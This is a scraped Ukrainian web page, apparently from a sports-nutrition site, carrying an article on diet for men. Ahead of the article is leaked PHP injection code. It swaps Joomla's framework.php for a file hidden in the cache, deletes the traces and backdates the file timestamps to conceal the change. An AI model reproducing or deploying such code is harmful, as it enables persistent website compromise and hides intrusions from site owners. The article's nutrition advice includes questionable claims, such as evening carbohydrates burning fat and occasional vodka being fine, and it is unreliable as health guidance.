$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Харчування людини | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Харчування людини

Сучасний чоловік схильний до досить динамічного способу життя, причому дана динаміка супроводжує його з дня на день протягом усього його життя. Найчастіше у чоловіків не залишається часу на повноцінний відпочинок, а головне на правильне харчування. А ось правильне харчування йому якраз необхідне. Саме воно може допомогти йому подолати всі труднощі сучасного світу.

Як і чим повинен харчуватися сучасний чоловік? Що лежить в основі правильного харчування для чоловіків? Найчастіше чоловіки не замислюються над цими питаннями. Проте Вам потрібно про це знати! Тільки правильне харчування може зберегти Ваші сили.

Дорогі чоловіки, перш за все, хочеться звернути Вашу увагу на м'ясо. Основним компонентом м'яса є білок. Саме білок вважається найголовнішим джерелом енергії для представників сильної статі. Пам'ятайте, споживання м'ясної їжі зробить Вас «богатирем». Другим важливим продуктом у раціоні правильного харчування для чоловіків є свіжа риба. До її складу входять полі ненасичені жирні кислоти. Вони допоможуть продовжити молодість Вашого організму. І, нарешті, третім важливим компонентом Вашого раціону були визнані молочні продукти. Найкраще вживати кефір і йогурти, тому що саме до їх складу входять біфідобактерії. Молочні продукти не повинні бути жирними. Більш того, кожен день Ви повинні з'їдати як мінімум п'ять сотень грам овочів і фруктів. Слід зазначити, що найважливішою мінеральною речовиною в правильному харчуванні для чоловіків є цинк.

Сучасне життя вимагає від чоловіка хорошої фізичної і психічної підготовки. Зберегти, підтримати, а також примножити чоловіче здоров'я і чоловічу силу допоможуть спеціальні харчові добавки. Харчові добавки доповнюють щоденний раціон всіма необхідними для організму речовинами. Сучасний ринок пропонує безліч різноманітних харчових добавок. Але при їх виборі варто звертати увагу на склад, якість і виробника. Якщо Ви вирішите придбати харчові добавки через всесвітню мережу Інтернет, то варто почитати відгуки про той чи інший продукт.

Досить часто трапляється так, що чоловік, відірвавшись від повсякденних справ і поглянувши в дзеркало, відзначає, що він вже виглядає не так «струнко», як він виглядав раніше. Найчастіше такі чоловіки намагаються нічого не помічати і йдуть далі. Це не зовсім правильно. На сьогоднішній день існує величезна кількість дієт, які були розроблені спеціально для чоловіків. В основі таких дієт лежить принцип - з їжею слід поглинати стільки енергії, скільки її необхідно для виконання всіх життєвих функцій і повсякденної роботи.

У раціон чоловіка, який стежить за своїм зовнішнім виглядом, не повинні входити занадто жирні і смажені страви, сало, солодкі страви, борошняні вироби, солодкі фруктові води та алкогольні напої. Буде краще, якщо Ви зменшите кількість споживаних соусів або соусу. Їжте овочі та фрукти, а також як можна більше зелені. На сніданок їжте продукти, до складу яких входить велика кількість вуглеводів. Вони дадуть Вам енергію на весь день. На обід вживайте білки. Що стосується вечері, то в цей час доби найкраще їсти продукти, які містять вуглеводи. Вони допомагають спалювати жири.

Між прийомами їжі Ви можете собі дозволити випити пакет кефіру або склянку томатного соку. Ні в якому разі не пийте міцних спиртних напоїв, вони тільки підсилюють апетит. Час від часу можна випити келих вина або чарку горілочки, але не більше.

Правильне харчування для чоловіків - це запорука їхнього успіху! Дорогі чоловіки, вживайте здорову їжу, і успіх Вам гарантовано!
 
Спортивне харчування Харчування людини